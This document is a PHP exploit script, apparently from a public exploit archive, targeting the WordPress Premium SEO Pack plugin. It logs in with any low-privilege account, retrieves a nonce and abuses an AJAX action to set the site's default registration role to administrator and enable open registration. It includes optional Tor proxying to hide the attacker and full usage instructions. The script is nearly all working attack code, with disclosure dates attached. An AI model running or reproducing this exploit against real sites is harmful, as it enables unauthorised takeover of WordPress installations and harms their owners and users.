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Wordpress Premium SEO Pack Plugin - wp_options Overwrite
<?php /** * Exploit Title: Premium SEO Pack Exploit * Google Dork: * Exploit Author: wp0Day.com <contact@wp0day.com> * Vendor Homepage: http://aa-team.com/ * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2 * Version: * Tested on: Debian 8, PHP 5.6.17-3 * Type: Authenticated (customer, subscriber) wp_options overwrite * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:u:p:a:",array('tor:')); echo "Current Options:\n"; print_r($options); for($i=4;$i>0;$i--){ echo "Starting in $i \r"; sleep(1); } echo "Starting.... \r"; echo "\n"; $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ###\n"; echo "Setting TOR Proxy...\n"; $curl->addOption(CURLOPT_PROXY,""); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address\n"; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()."\n"; echo "Are you sure you want to do this?\nType 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting!\n"); } echo "OK...\n"; } function logIn(){ global $curl, $options; file_put_contents('cookies.txt',"\n"); $curl->setCookieFile('cookies.txt'); $curl->get($options['t']); $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); $curl->post($options['t'].'/wp-login.php', $data); $status = $curl->getTransferInfo('http_code'); if ($status !== 302){ echo "Login probably failed, aborting...\n"; echo "Login response saved to login.html.\n"; die(); } file_put_contents('login.html',$curl->getResponse()); } function exploit(){ global $curl, $options; if ($options['m'] == 'admin_on') { echo "Setting default role on registration to Administrator\n"; /* Getting a nonce */ $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); $resp = json_decode($resp,true); preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); if (!isset($mat[1])){ die("Failed getting box_nonce\n"); } $nonce = $mat[1][0]; $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1); $new_settings = urlencode(json_encode($new_settings)); echo "Sending settings to update\n"; $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); $resp = json_decode($resp,true); if (@$resp['status'] == 'ok'){ echo "Admin mode is ON, go ahead an register yourself an Admin account! \n"; } else { echo "Setting admin mode failed \n"; } echo "Raw response: " . $curl->getResponse() . "\n"; } if ($options['m'] == 'admin_off') { echo "Setting default role on registration to Subscriber\n"; /* Getting a nonce */ $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup'); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); $resp = json_decode($resp,true); preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat); if (!isset($mat[1])){ die("Failed getting box_nonce\n"); } $nonce = $mat[1][0]; $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0); $new_settings = urlencode(json_encode($new_settings)); echo "Sending settings to update\n"; $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); $resp = json_decode($resp,true); if (@$resp['status'] == 'ok'){ echo "Admin mode is OFF \n"; } echo "Raw response: " . $curl->getResponse() . "\n"; } } logIn(); exploit(); function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if ( !isset($options['u']) ){ return false; } if ( !isset($options['p']) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){ return false; } if ($options['m'] == 'tag' && !isset($options['a'])){ } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD Premium SEO Pack Exploit Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE] *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" ** [MODE] admin_on - Sets default role on registration to Administrator admin_off - Sets default role on registration to Subscriber Examples: php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help."\n\n"; die(); } # 0day.today [2024-12-26] #